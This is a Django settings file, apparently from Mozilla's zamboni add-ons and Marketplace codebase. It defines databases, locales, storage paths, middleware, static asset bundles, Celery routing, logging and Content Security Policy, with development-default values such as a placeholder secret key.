# then connect to http://localhost:37767/ to view
REMOTE_JS_DEBUG = False
# LESS CSS OPTIONS (Debug only).
LESS_PREPROCESS = True # Compile LESS with Node, rather than client-side JS?
LESS_LIVE_REFRESH = False # Refresh the CSS on save?
LESS_BIN = 'lessc'
# Path to stylus (to compile .styl files).
STYLUS_BIN = 'stylus'
# Path to cleancss (our CSS minifier).
CLEANCSS_BIN = 'cleancss'
# Path to uglifyjs (our JS minifier).
UGLIFY_BIN = 'uglifyjs' # Set as None to use YUI instead (at your risk).
# Path to pngcrush (for image optimization).
PNGCRUSH_BIN = 'pngcrush'
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
FLIGTAR = '[email protected]'
EDITORS_EMAIL = '[email protected]'
SENIOR_EDITORS_EMAIL = '[email protected]'
THEMES_EMAIL = '[email protected]'
MARKETPLACE_EMAIL = '[email protected]'
ABUSE_EMAIL = '[email protected]'
NOBODY_EMAIL = '[email protected]'
DATABASES = {
'default': {
'NAME': 'zamboni',
'ENGINE': 'django.db.backends.mysql',
'HOST': '',
'PORT': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
'TEST_CHARSET': 'utf8',
'TEST_COLLATION': 'utf8_general_ci',
},
}
# A database to be used by the services scripts, which does not use Django.
# The settings can be copied from DATABASES, but since its not a full Django
# database connection, only some values are supported.
SERVICES_DATABASE = {
'NAME': 'zamboni',
'USER': '',
'PASSWORD': '',
'HOST': '',
}
DATABASE_ROUTERS = ('multidb.PinningMasterSlaveRouter',)
# For use django-mysql-pool backend.
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 300
}
# Put the aliases for your slave databases in this list.
SLAVE_DATABASES = []
PASSWORD_HASHERS = ()
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
# Accepted locales
# Note: If you update this list, don't forget to also update the locale
# permissions in the database.
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'bn-BD', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es',
'eu', 'fa', 'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mk',
'mn', 'nl', 'pl', 'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sv-SE',
'uk', 'vi', 'zh-CN', 'zh-TW',
)
# Explicit conversion of a shorter language code into a more specific one.
SHORTER_LANGUAGES = {
'en': 'en-US', 'ga': 'ga-IE', 'pt': 'pt-PT', 'sv': 'sv-SE', 'zh': 'zh-CN'
}
# Not shown on the site, but .po files exist and these are available on the
# L10n dashboard. Generally languages start here and move into AMO_LANGUAGES.
HIDDEN_LANGUAGES = ('cy', 'hr', 'sr', 'sr-Latn', 'tr')
def lazy_langs(languages):
from product_details import product_details
if not product_details.languages:
return {}
return dict([(i.lower(), product_details.languages[i]['native'])
for i in languages])
# Where product details are stored see django-mozilla-product-details
PROD_DETAILS_DIR = path('lib/product_json')
# Override Django's built-in with our native names
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
RTL_LANGUAGES = ('ar', 'fa', 'fa-IR', 'he')
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
# Tower / L10n
LOCALE_PATHS = (path('locale'),)
TEXT_DOMAIN = 'messages'
STANDALONE_DOMAINS = [TEXT_DOMAIN, 'javascript']
TOWER_KEYWORDS = {
'_lazy': None,
}
TOWER_ADD_HEADERS = True
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# The host currently running the site. Only use this in code for good reason;
# the site is designed to run on a cluster and should continue to support that
HOSTNAME = socket.gethostname()
# The front end domain of the site. If you're not running on a cluster this
# might be the same as HOSTNAME but don't depend on that. Use this when you
# need the real domain.
DOMAIN = HOSTNAME
# Full base URL for your main site including protocol. No trailing slash.
# Example: https://addons.mozilla.org
SITE_URL = 'http://%s' % DOMAIN
# Domain of the services site. This is where your API, and in-product pages
# live.
SERVICES_DOMAIN = 'services.%s' % DOMAIN
# Full URL to your API service. No trailing slash.
# Example: https://services.addons.mozilla.org
SERVICES_URL = 'http://%s' % SERVICES_DOMAIN
# The domain of the mobile site.
MOBILE_DOMAIN = 'm.%s' % DOMAIN
# The full url of the mobile site.
MOBILE_SITE_URL = 'http://%s' % MOBILE_DOMAIN
OAUTH_CALLBACK_VIEW = 'api.views.request_token_ready'
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = path('media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to a temporary storage area
TMP_PATH = path('tmp')
# When True, create a URL root /tmp that serves files in your temp path.
# This is useful for development to view upload pics, etc.
# NOTE: This only works when DEBUG is also True.
SERVE_TMP_PATH = False
# Absolute path to a writable directory shared by all servers. No trailing
# slash. Example: /data/
NETAPP_STORAGE = TMP_PATH
# File path for storing XPI/JAR files (or any files associated with an
# add-on). Example: /mnt/netapp_amo/addons.mozilla.org-remora/files
ADDONS_PATH = NETAPP_STORAGE + '/addons'
# Like ADDONS_PATH but protected by the app. Used for storing files that should
# not be publicly accessible (like disabled add-ons).
GUARDED_ADDONS_PATH = NETAPP_STORAGE + '/guarded-addons'
# Used for storing signed webapps.
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed-apps'
# Special reviewer signed ones for special people.
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed-apps-reviewer'
# A seperate signing server for signing packaged apps. If not set, for example
# on local dev instances, the file will just be copied over unsigned.
SIGNED_APPS_SERVER_ACTIVE = False
# The reviewers equivalent to the above.
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = False
# This is the signing REST server for signing apps.
SIGNED_APPS_SERVER = ''
# This is the signing REST server for signing apps with the reviewers cert.
SIGNED_APPS_REVIEWER_SERVER = ''
# And how long we'll give the server to respond.
SIGNED_APPS_SERVER_TIMEOUT = 10
# Send the more terse manifest signatures to the app signing server.
SIGNED_APPS_OMIT_PER_FILE_SIGS = True
# Absolute path to a writable directory shared by all servers. No trailing
# slash.
# Example: /data/uploads
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
# File path for add-on files that get rsynced to mirrors.
# /mnt/netapp_amo/addons.mozilla.org-remora/public-staging
MIRROR_STAGE_PATH = NETAPP_STORAGE + '/public-staging'
# Where dumped apps will be written too.
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
# Tarballs in DUMPED_APPS_PATH deleted 30 days after they have been written.
DUMPED_APPS_DAYS_DELETE = 3600 * 24 * 30
# Where dumped apps will be written too.
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
# Tarballs in DUMPED_USERS_PATH deleted 30 days after they have been written.
DUMPED_USERS_DAYS_DELETE = 3600 * 24 * 30
# paths that don't require an app prefix
SUPPORTED_NONAPPS = ('about', 'admin', 'apps', 'credits',
'developer_agreement', 'developer_faq', 'developers',
'editors', 'faq', 'google1f3e37b7351799a5.html', 'img',
'jsi18n', 'media', 'review_guide', 'robots.txt',
'statistics', 'services', 'sunbird')
DEFAULT_APP = 'firefox'
# paths that don't require a locale prefix
SUPPORTED_NONLOCALES = ('google1f3e37b7351799a5.html', 'img', 'media',
'robots.txt', 'services', 'downloads')
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'r#%9w^o_80)7f%!_ir5zx$tu3mupw9u%&s!)-_q%gy7i+fhx#)'
# Templates
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'lib.template_loader.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# We don't want jingo's template loaded to pick up templates for third party
# apps that don't use Jinja2. The Following is a list of prefixes for jingo to
# ignore.
JINGO_EXCLUDE_APPS = (
'djcelery',
'django_extensions',
'admin',
'browserid',
'toolbar_statsd',
'registration',
'debug_toolbar',
'waffle',
)
JINGO_EXCLUDE_PATHS = (
'webapps/dump',
'users/email',
'reviews/emails',
'editors/emails',
'amo/emails',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'session_csrf.context_processor',
'django.contrib.messages.context_processors.messages',
'amo.context_processors.app',
'amo.context_processors.i18n',
'amo.context_processors.global_settings',
'amo.context_processors.static_url',
'jingo_minify.helpers.build_ids',
)
TEMPLATE_DIRS = (
path('media/docs'),
path('templates'),
)
def JINJA_CONFIG():
import jinja2
from django.conf import settings
from django.core.cache import cache
config = {'extensions': ['tower.template.i18n', 'amo.ext.cache',
'jinja2.ext.do',
'jinja2.ext.with_', 'jinja2.ext.loopcontrols'],
'finalize': lambda x: x if x is not None else ''}
if False and not settings.DEBUG:
# We're passing the _cache object directly to jinja because
# Django can't store binary directly; it enforces unicode on it.
# Details: http://jinja.pocoo.org/2/documentation/api#bytecode-cache
# and in the errors you get when you try it the other way.
bc = jinja2.MemcachedBytecodeCache(cache._cache,
"%sj2:" % settings.CACHE_PREFIX)
config['cache_size'] = -1 # Never clear the cache
config['bytecode_cache'] = bc
return config
MIDDLEWARE_CLASSES = (
# AMO URL middleware comes first so everyone else sees nice URLs.
'django_statsd.middleware.GraphiteRequestTimingMiddleware',
'django_statsd.middleware.GraphiteMiddleware',
'amo.middleware.LocaleAndAppURLMiddleware',
# Mobile detection should happen in Zeus.
'mobility.middleware.DetectMobileMiddleware',
'mobility.middleware.XMobileMiddleware',
'amo.middleware.RemoveSlashMiddleware',
# Munging REMOTE_ADDR must come before ThreadRequest.
'commonware.middleware.SetRemoteAddrFromForwardedFor',
'commonware.middleware.FrameOptionsHeader',
'commonware.middleware.StrictTransportMiddleware',
'multidb.middleware.PinningRouterMiddleware',
'waffle.middleware.WaffleMiddleware',
'csp.middleware.CSPMiddleware',
'amo.middleware.CommonMiddleware',
'amo.middleware.NoVarySessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'commonware.log.ThreadRequestMiddleware',
'mkt.search.middleware.ElasticsearchExceptionMiddleware',
'session_csrf.CsrfMiddleware',
# This should come after authentication middleware
'access.middleware.ACLMiddleware',
'commonware.middleware.ScrubRequestOnException',
)
# Auth
AUTHENTICATION_BACKENDS = (
'django_browserid.auth.BrowserIDBackend',
)
AUTH_USER_MODEL = 'users.UserProfile'
# Override this in the site settings.
ROOT_URLCONF = 'lib.urls_base'
INSTALLED_APPS = (
'amo', # amo comes first so it always takes precedence.
'abuse',
'access',
'addons',
'applications',
'cronjobs',
'csp',
'editors',
'files',
'jingo_minify',
'lib.es',
'product_details',
'reviews',
'stats',
'tags',
'tower', # for ./manage.py extract
'translations',
'users',
'versions',
'mkt.webapps',
'mkt.collections',
'mkt.comm',
'mkt.prices',
'zadmin',
# Third party apps
'djcelery',
'django_extensions',
'django_nose',
'gunicorn',
'raven.contrib.django',
'waffle',
# Django contrib apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
# Has to load after auth
'django_browserid',
'django_statsd',
)
# These apps are only needed in a testing environment. They are added to
# INSTALLED_APPS by the RadicalTestSuiteRunnerWithExtraApps test runner.
TEST_INSTALLED_APPS = (
'translations.tests.testapp',
)
# Tests
TEST_RUNNER = 'amo.runner.RadicalTestSuiteRunnerWithExtraApps'
NOSE_ARGS = [
'--with-fixture-bundling',
'--exclude=mkt/*',
]
# Tells the extract script what files to look for l10n in and what function
# handles the extraction. The Tower library expects this.
DOMAIN_METHODS = {
'messages': [
('apps/**.py',
'tower.management.commands.extract.extract_tower_python'),
('apps/**/templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('mkt/**.py',
'tower.management.commands.extract.extract_tower_python'),
('mkt/**/templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('mkt/templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('**/templates/**.lhtml',
'tower.management.commands.extract.extract_tower_template'),
],
'javascript': [
# We can't say **.js because that would dive into mochikit and timeplot
# and all the other baggage we're carrying. Timeplot, in particular,
# crashes the extractor with bad unicode data.
('media/js/*.js', 'javascript'),
('media/js/common/**.js', 'javascript'),
('media/js/impala/**.js', 'javascript'),
('media/js/zamboni/**.js', 'javascript'),
('media/js/devreg/**.js', 'javascript'),
],
}
# Bundles is a dictionary of two dictionaries, css and js, which list css files
# and js files that can be bundled together by the minify app.
MINIFY_BUNDLES = {
'css': {
# CSS files common to the entire site.
'zamboni/css': (
'css/legacy/main.css',
'css/legacy/main-mozilla.css',
'css/legacy/jquery-lightbox.css',
'css/legacy/autocomplete.css',
'css/zamboni/zamboni.css',
'css/global/headerfooter.css',
'css/zamboni/tags.css',
'css/zamboni/tabs.css',
'css/impala/formset.less',
'css/impala/suggestions.less',
'css/impala/header.less',
'css/impala/moz-tab.css',
'css/impala/footer.less',
'css/impala/faux-zamboni.less',
'css/impala/collection-stats.less',
),
'zamboni/impala': (
'css/impala/base.css',
'css/legacy/jquery-lightbox.css',
'css/impala/site.less',
'css/impala/typography.less',
'css/global/headerfooter.css',
'css/impala/forms.less',
'css/common/invisible-upload.less',
'css/impala/header.less',
'css/impala/footer.less',
'css/impala/moz-tab.css',
'css/impala/hovercards.less',
'css/impala/toplist.less',
'css/impala/reviews.less',
'css/impala/buttons.less',
'css/impala/addon_details.less',
'css/impala/policy.less',
'css/impala/expando.less',
'css/impala/popups.less',
'css/impala/l10n.less',
'css/impala/contributions.less',
'css/impala/lightbox.less',
'css/impala/prose.less',
'css/impala/abuse.less',
'css/impala/paginator.less',
'css/impala/listing.less',
'css/impala/versions.less',
'css/impala/users.less',
'css/impala/collections.less',
'css/impala/tooltips.less',
'css/impala/search.less',
'css/impala/suggestions.less',
'css/impala/colorpicker.less',
'css/impala/login.less',
'css/impala/dictionaries.less',
'css/impala/apps.less',
'css/impala/formset.less',
'css/impala/tables.less',
),
'zamboni/mobile': (
'css/zamboni/mobile.css',
'css/mobile/typography.less',
'css/mobile/forms.less',
'css/mobile/header.less',
'css/mobile/search.less',
'css/mobile/listing.less',
'css/mobile/footer.less',
),
'zamboni/admin': (
'css/zamboni/admin-django.css',
'css/zamboni/admin-mozilla.css',
'css/zamboni/admin_features.css',
# Datepicker styles and jQuery UI core.
'css/zamboni/jquery-ui/custom-1.7.2.css',
),
},
'js': {
# JS files common to the entire site (pre-impala).
'common': (
'js/lib/jquery-1.6.4.js',
'js/lib/underscore.js',
'js/zamboni/browser.js',
'js/zamboni/init.js',
'js/impala/capabilities.js',
'js/lib/format.js',
'js/lib/jquery.cookie.js',
'js/zamboni/storage.js',
'js/zamboni/apps.js',
'js/zamboni/buttons.js',
'js/zamboni/tabs.js',
'js/common/keys.js',
# jQuery UI
'js/lib/jquery-ui/jquery.ui.core.js',
'js/lib/jquery-ui/jquery.ui.position.js',
'js/lib/jquery-ui/jquery.ui.widget.js',
'js/lib/jquery-ui/jquery.ui.mouse.js',
'js/lib/jquery-ui/jquery.ui.autocomplete.js',
'js/lib/jquery-ui/jquery.ui.datepicker.js',
'js/lib/jquery-ui/jquery.ui.sortable.js',
'js/zamboni/helpers.js',
'js/zamboni/global.js',
'js/common/ratingwidget.js',
'js/lib/jquery-ui/jqModal.js',
'js/zamboni/l10n.js',
'js/zamboni/debouncer.js',
# Homepage
'js/zamboni/homepage.js',
# Add-ons details page
'js/lib/jquery-ui/ui.lightbox.js',
'js/zamboni/addon_details.js',
'js/impala/abuse.js',
'js/zamboni/reviews.js',
# Users
'js/zamboni/users.js',
# Fix-up outgoing links
'js/zamboni/outgoing_links.js',
# Hover delay for global header
'js/global/menu.js',
# Password length and strength
'js/zamboni/password-strength.js',
# Search suggestions
'js/impala/forms.js',
'js/impala/ajaxcache.js',
'js/impala/suggestions.js',
'js/impala/site_suggestions.js',
),
# Impala and Legacy: Things to be loaded at the top of the page
'preload': (
'js/lib/jquery-1.6.4.js',
'js/impala/preloaded.js',
'js/zamboni/analytics.js',
),
# Impala: Things to be loaded at the bottom
'impala': (
'js/lib/underscore.js',
'js/zamboni/browser.js',
'js/zamboni/init.js',
'js/impala/capabilities.js',
'js/lib/format.js',
'js/lib/jquery.cookie.js',
'js/zamboni/storage.js',
'js/zamboni/apps.js',
'js/zamboni/buttons.js',
'js/lib/jquery.pjax.js',
'js/impala/footer.js',
'js/common/keys.js',
# BrowserID
'js/zamboni/browserid_support.js',
# jQuery UI
'js/lib/jquery-ui/jquery.ui.core.js',
'js/lib/jquery-ui/jquery.ui.position.js',
'js/lib/jquery-ui/jquery.ui.widget.js',
'js/lib/jquery-ui/jquery.ui.mouse.js',
'js/lib/jquery-ui/jquery.ui.autocomplete.js',
'js/lib/jquery-ui/jquery.ui.datepicker.js',
'js/lib/jquery-ui/jquery.ui.sortable.js',
'js/lib/truncate.js',
'js/zamboni/truncation.js',
'js/impala/ajaxcache.js',
'js/zamboni/helpers.js',
'js/zamboni/global.js',
'js/lib/stick.js',
'js/impala/global.js',
'js/common/ratingwidget.js',
'js/lib/jquery-ui/jqModal.js',
'js/zamboni/l10n.js',
'js/impala/forms.js',
# Homepage
'js/impala/homepage.js',
# Add-ons details page
'js/lib/jquery-ui/ui.lightbox.js',
'js/impala/addon_details.js',
'js/impala/abuse.js',
'js/impala/reviews.js',
# Browse listing pages
'js/impala/listing.js',
# Collections
'js/impala/collections.js',
# Users
'js/zamboni/users.js',
'js/impala/users.js',
# Search
'js/impala/serializers.js',
'js/impala/search.js',
'js/impala/suggestions.js',
'js/impala/site_suggestions.js',
# Login
'js/impala/login.js',
# Fix-up outgoing links
'js/zamboni/outgoing_links.js',
),
'zamboni/files': (
'js/lib/diff_match_patch_uncompressed.js',
'js/lib/syntaxhighlighter/xregexp-min.js',
'js/lib/syntaxhighlighter/shCore.js',
'js/lib/syntaxhighlighter/shLegacy.js',
'js/lib/syntaxhighlighter/shBrushAppleScript.js',
'js/lib/syntaxhighlighter/shBrushAS3.js',
'js/lib/syntaxhighlighter/shBrushBash.js',
'js/lib/syntaxhighlighter/shBrushCpp.js',
'js/lib/syntaxhighlighter/shBrushCSharp.js',
'js/lib/syntaxhighlighter/shBrushCss.js',
'js/lib/syntaxhighlighter/shBrushDiff.js',
'js/lib/syntaxhighlighter/shBrushJava.js',
'js/lib/syntaxhighlighter/shBrushJScript.js',
'js/lib/syntaxhighlighter/shBrushPhp.js',
'js/lib/syntaxhighlighter/shBrushPlain.js',
'js/lib/syntaxhighlighter/shBrushPython.js',
'js/lib/syntaxhighlighter/shBrushSass.js',
'js/lib/syntaxhighlighter/shBrushSql.js',
'js/lib/syntaxhighlighter/shBrushVb.js',
'js/lib/syntaxhighlighter/shBrushXml.js',
'js/zamboni/storage.js',
'js/zamboni/files.js',
),
'zamboni/mobile': (
'js/lib/jquery-1.6.4.js',
'js/lib/underscore.js',
'js/lib/jqmobile.js',
'js/lib/jquery.cookie.js',
'js/zamboni/apps.js',
'js/zamboni/browser.js',
'js/zamboni/init.js',
'js/impala/capabilities.js',
'js/lib/format.js',
'js/zamboni/mobile/buttons.js',
'js/lib/truncate.js',
'js/zamboni/truncation.js',
'js/impala/footer.js',
'js/zamboni/helpers.js',
'js/zamboni/mobile/general.js',
'js/common/ratingwidget.js',
'js/zamboni/browserid_support.js',
),
'zamboni/admin': (
'js/zamboni/admin.js',
'js/zamboni/admin_features.js',
'js/zamboni/admin_validation.js',
),
# This is included when DEBUG is True. Bundle in <head>.
'debug': (
'js/debug/less_setup.js',
'js/lib/less.js',
'js/debug/less_live.js',
),
}
}
# Caching
# Prefix for cache keys (will prevent collisions when running parallel copies)
CACHE_PREFIX = 'amo:%s:' % build_id
KEY_PREFIX = CACHE_PREFIX
FETCH_BY_ID = True
# Number of seconds a count() query should be cached. Keep it short because
# it's not possible to invalidate these queries.
CACHE_COUNT_TIMEOUT = 60
# To enable pylibmc compression (in bytes)
PYLIBMC_MIN_COMPRESS_LEN = 0 # disabled
# External tools.
JAVA_BIN = '/usr/bin/java'
# Add-on download settings.
MIRROR_URL = 'http://releases.mozilla.org/pub/mozilla.org/addons'
LOCAL_MIRROR_URL = 'https://static.addons.mozilla.net/_files'
PRIVATE_MIRROR_URL = '/_privatefiles'
# File paths
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
FEATURED_APP_BG_PATH = UPLOADS_PATH + '/featured_app_background'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_DEFAULT_PATH = os.path.join(MEDIA_ROOT, 'img/addon-icons')
CA_CERT_BUNDLE_PATH = os.path.join(ROOT, 'apps/amo/certificates/roots.pem')
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
# URL paths
# paths for images, e.g. mozcdn.com/amo or '/static'
STATIC_URL = SITE_URL + '/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/addon-icons'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
ADDON_ICON_URL = (STATIC_URL +
'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
# paths for uploaded extensions
COLLECTION_ICON_URL = (STATIC_URL +
'img/uploads/collection_icons/%s/%s.png?m=%s')
NEW_PERSONAS_IMAGE_URL = STATIC_URL + 'img/uploads/themes/%(id)d/%(file)s'
PERSONAS_IMAGE_URL = ('http://getpersonas.cdn.mozilla.net/static/'
'%(tens)d/%(units)d/%(id)d/%(file)s')
PERSONAS_IMAGE_URL_SSL = ('https://getpersonas.cdn.mozilla.net/static/'
'%(tens)d/%(units)d/%(id)d/%(file)s')
PERSONAS_UPDATE_URL = 'https://www.getpersonas.com/update_check/%d'
VAMO_URL = 'https://versioncheck.addons.mozilla.org'
NEW_PERSONAS_UPDATE_URL = VAMO_URL + '/%(locale)s/themes/update-check/%(id)d'
# Outgoing URL bouncer
REDIRECT_URL = 'http://outgoing.mozilla.org/v1/'
REDIRECT_SECRET_KEY = ''
PFS_URL = 'https://pfs.mozilla.org/plugins/PluginFinderService.php'
# Allow URLs from these servers. Use full domain names.
REDIRECT_URL_WHITELIST = ['addons.mozilla.org']
# Default to short expiration; check "remember me" to override
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SESSION_COOKIE_AGE = 1209600
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN # bug 608797
MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
# These should have app+locale at the start to avoid redirects
LOGIN_URL = "/users/login"
LOGOUT_URL = "/users/logout"
LOGIN_REDIRECT_URL = "/"
LOGOUT_REDIRECT_URL = "/"
# When logging in with browser ID, a username is created automatically.
# In the case of duplicates, the process is recursive up to this number
# of times.
MAX_GEN_USERNAME_TRIES = 50
# Email settings
ADDONS_EMAIL = "Mozilla Add-ons <[email protected]>"
DEFAULT_FROM_EMAIL = ADDONS_EMAIL
# Email goes to the console by default. s/console/smtp/ for regular delivery
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Please use all lowercase for the blacklist.
EMAIL_BLACKLIST = (
'[email protected]',
)
# URL for Add-on Validation FAQ.
VALIDATION_FAQ_URL = ('https://wiki.mozilla.org/AMO:Editors/EditorGuide/'
'AddonReviews#Step_2:_Automatic_validation')
## Celery
BROKER_URL = 'amqp://zamboni:zamboni@localhost:5672/zamboni'
BROKER_CONNECTION_TIMEOUT = 0.1
CELERY_RESULT_BACKEND = 'amqp'
CELERY_IGNORE_RESULT = True
CELERY_SEND_TASK_ERROR_EMAILS = True
CELERYD_HIJACK_ROOT_LOGGER = False
CELERY_IMPORTS = ('lib.video.tasks', 'lib.metrics',
'lib.es.management.commands.reindex_mkt')
# We have separate celeryds for processing devhub & images as fast as possible
# Some notes:
# - always add routes here instead of @task(queue=<name>)
# - when adding a queue, be sure to update deploy.py so that it gets restarted
CELERY_ROUTES = {
# Priority.
# If your tasks need to be run as soon as possible, add them here so they
# are routed to the priority queue.
'lib.crypto.packaged.sign': {'queue': 'priority'},
'mkt.inapp_pay.tasks.fetch_product_image': {'queue': 'priority'},
'mkt.webapps.tasks.index_webapps': {'queue': 'priority'},
'mkt.webapps.tasks.unindex_webapps': {'queue': 'priority'},
'stats.tasks.update_monolith_stats': {'queue': 'priority'},
'versions.tasks.update_supported_locales_single': {'queue': 'priority'},
# Other queues we prioritize below.
# MKT Devhub.
'mkt.developers.tasks.validator': {'queue': 'devhub'},
'mkt.developers.tasks.file_validator': {'queue': 'devhub'},
'mkt.developers.tasks.resize_icon': {'queue': 'devhub'},
'mkt.developers.tasks.resize_preview': {'queue': 'devhub'},
'mkt.developers.tasks.fetch_icon': {'queue': 'devhub'},
'mkt.developers.tasks.fetch_manifest': {'queue': 'devhub'},
# Videos.
'lib.video.tasks.resize_video': {'queue': 'devhub'},
# Images.
'mkt.webapps.tasks.regenerate_icons_and_thumbnails': {'queue': 'images'},
# Comm.
'mkt.comm.tasks.migrate_activity_log': {'queue': 'limited'},
}
# This is just a place to store these values, you apply them in your
# task decorator, for example:
# @task(time_limit=CELERY_TIME_LIMITS['lib...']['hard'])
# Otherwise your task will use the default settings.
CELERY_TIME_LIMITS = {
'lib.video.tasks.resize_video': {'soft': 360, 'hard': 600},
'lib.es.management.commands.reindex_mkt.run_indexing': {
'soft': 60 * 20, # 20 mins to reindex.
'hard': 60 * 120, # 120 mins hard limit.
},
}
# When testing, we always want tasks to raise exceptions. Good for sanity.
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
# Time in seconds before celery.exceptions.SoftTimeLimitExceeded is raised.
# The task can catch that and recover but should exit ASAP. Note that there is
# a separate, shorter timeout for validation tasks.
CELERYD_TASK_SOFT_TIME_LIMIT = 60 * 2
## Fixture Magic
CUSTOM_DUMPS = {
'addon': { # ./manage.py custom_dump addon id
'primary': 'addons.addon', # This is our reference model.
'dependents': [ # These are items we wish to dump.
# Magic turns this into current_version.files.all()[0].
'current_version.files.all.0',
'current_version.apps.all.0',
'addonuser_set.all.0',
],
'order': ('applications.application', 'translations.translation',
'addons.addontype', 'files.platform', 'addons.addon',
'versions.license', 'versions.version', 'files.file'),
'excludes': {
'addons.addon': ('_current_version',),
}
}
}
## Hera (http://github.com/clouserw/hera)
HERA = [{'USERNAME': '',
'PASSWORD': '',
'LOCATION': '',
}]
# Logging
LOG_LEVEL = logging.DEBUG
HAS_SYSLOG = True # syslog is used if HAS_SYSLOG and NOT DEBUG.
SYSLOG_TAG = "http_app_addons"
SYSLOG_TAG2 = "http_app_addons2"
# See PEP 391 and log_settings.py for formatting help. Each section of
# LOGGING will get merged into the corresponding section of
# log_settings.py. Handlers and log levels are set up automatically based
# on LOG_LEVEL and DEBUG unless you set them here. Messages will not
# propagate through a logger unless propagate: True is set.
LOGGING_CONFIG = None
LOGGING = {
'loggers': {
'amqplib': {'handlers': ['null']},
'caching.invalidation': {'handlers': ['null']},
'caching': {'level': logging.WARNING},
'suds': {'handlers': ['null']},
'z.task': {'level': logging.INFO},
'z.es': {'level': logging.INFO},
'z.heka': {'level': logging.INFO},
's.client': {'level': logging.INFO},
'nose': {'level': logging.WARNING},
},
}
HEKA_CONF = {
'logger': 'zamboni',
'plugins': {
'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
'syslog_ident': 'http_app_addons_marketplace',
'syslog_priority': 'ALERT',
}),
# Sentry accepts messages over UDP, you'll need to
# configure this URL so that logstash can relay the message
# properly
'raven': ('heka_raven.raven_plugin:config_plugin',
{'dsn': 'udp://username:[email protected]:9000/2'}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': '127.0.0.1',
'port': 5565,
},
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = False
USE_HEKA_FOR_TASTYPIE = False
CEF_PRODUCT = "amo"
# CSP Settings
CSP_REPORT_URI = '/services/csp/report'
CSP_POLICY_URI = '/services/csp/policy?build=%s' % build_id
CSP_REPORT_ONLY = True
CSP_ALLOW = ("'self'",)
CSP_IMG_SRC = ("'self'", SITE_URL,
"https://ssl.google-analytics.com",
"https://www.google-analytics.com",
"https://*.newrelic.com",
"data:"
)
CSP_SCRIPT_SRC = ("'self'", SITE_URL,
"https://login.persona.org",
"https://firefoxos.persona.org",
"https://ssl.google-analytics.com",
"https://www.google-analytics.com",
"https://*.newrelic.com",
)
CSP_STYLE_SRC = ("'self'", SITE_URL,
)
CSP_OBJECT_SRC = ("'none'",)
CSP_MEDIA_SRC = ("'none'",)
